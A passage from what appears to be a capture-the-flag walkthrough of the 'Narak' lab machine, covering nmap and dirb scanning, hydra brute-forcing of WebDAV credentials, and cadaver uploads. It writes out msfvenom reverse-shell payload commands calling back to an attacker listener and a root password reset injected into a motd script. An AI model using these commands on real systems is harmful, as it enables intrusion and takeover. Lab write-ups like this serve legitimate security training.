当前位置:网站首页>Target narak
Target narak
2022-04-23 02:29:00 【Um, light】
The host found
nmap -sS 192.168.226.0/24
Port scanning

dirb Dictionary based directory scanning tool
Found three directories


Access the directory
Network storage file sharing WebDAV

Reuse hydra Below blasting
perhaps burpsuite Blast
yamdoot, Swarg
. Hydra (Hydra)
Medusa( Medusa )
patator
msf
Fine
use cewl The tool generates a dictionary by crawling the keywords of website information , Blasting through the generated dictionary

use hydra Blasting tools
-L Specify user name -P Specified password ip Address plus protocol plus path .http Is the agreement of the website ,get Is the request method used , Add path after

Try logging in again :

No information available , Check the source code :
cadaver Tool connection
cadaver http://192.168.8.132/webdav
username:yamdoot
password:Swarg
1. Baidu found webdav service , need cadaver Tool connection , After connecting, you can upload

Upload shell
nmap -O Found in fact linux System

msfvenom Create a Trojan
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22456 -f elf -o /home/kali/Desktop/yui.elf

monitor

Upload

liunx Failure, change to php Of
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php

msf monitor
visit php file

shell Get

Raise the right Authority maintenance
Low authority

To view the user :

mnt Catalog hell.sh

https://www.splitbrain.org/services/ook

brainfuck to text decode , Get decrypted content chitragupt It should be the password
chitragupt
Power raising assistant Raise the right github Open source project
https://github.com/mzet-/linux-exploit-suggester
linux Medium .sh How files are executed ?
1、 direct ./ Add file name .sh, If running hello.sh by ./hello.sh 【 The absolute path can also , but hello.sh There has to be x jurisdiction 】
chmod u+x hello.sh



Try one by one

Upload and unzip

use ssh Try logging in to another user , Enter the password you just decrypted , Found that the user logged in successfully


echo “echo ‘root:inferno’|sudo chpasswd” >> /etc/update-motd.d/00-header
Exit and reuse inferno Sign in
su -root
Succeed in getting root jurisdiction : password inferno

版权声明
本文为[Um, light]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204230228310494.html
边栏推荐
- Halo open source project learning (I): project launch
- Lane cross domain problem
- 【无标题】
- hack the box optimum靶机
- 005_ redis_ Set set
- Applet reads files
- Latin goat (20204-2022) - daily question 1
- [chrome extender] content_ Cross domain problem of script
- 【Chrome扩展程序】content_script的跨域问题
- 006_ redis_ Jedis quick start
猜你喜欢

A simple and open source navigation website source code
![[assembly language] understand](/img/73/2483bca93714e378ff5eef18bddcd1.jpg)
[assembly language] understand "stack" from the lowest point of view

SQL server2019无法下载所需文件,这可能表示安装程序的版本不再受支持,怎么办了

006_redis_SortedSet类型

001_redis设置存活时间

Halo open source project learning (I): project launch

Network jitter tool clumsy

Lane cross domain problem
![Parental delegation model [understanding]](/img/ba/07e280a2634018e0d6b56c05dd3bc0.png)
Parental delegation model [understanding]

They are all intelligent in the whole house. What's the difference between aqara and homekit?
随机推荐
Tp6 Alibaba Cloud SMS Window message Curl Error 60: SSL Certificate Problem: Unable to get local issuer Certificate
全局、獨享、局部路由守衛
009_Redis_RedisTemplate入门
day18--栈队列
001_redis设置存活时间
openstack 服务的启动
A domestic image segmentation project is heavy and open source!
arduino esp8266 网络升级 OTA
Consider defining a bean of type ‘com.netflix.discovery.AbstractDiscoveryClientOptionalArgs‘
Gray scale range corresponding to colors (red, yellow, green, blue, purple, pink, brick red and magenta) in HSV color space
How does Axure set the content of the text box to the current date when the page is loaded
Go language ⌈ mutex and state coordination ⌋
Arduino esp8266 network upgrade OTA
WordPress calls the specified page content. 2 get_ children()
小程序 canvas 画布半圆环
007_Redis_Jedis连接池
89 logistic回歸用戶畫像用戶響應度預測
从0开始开发一个chrome插件(2)
wordpress 调用指定页面内容详解2 get_children()
1、 Sequence model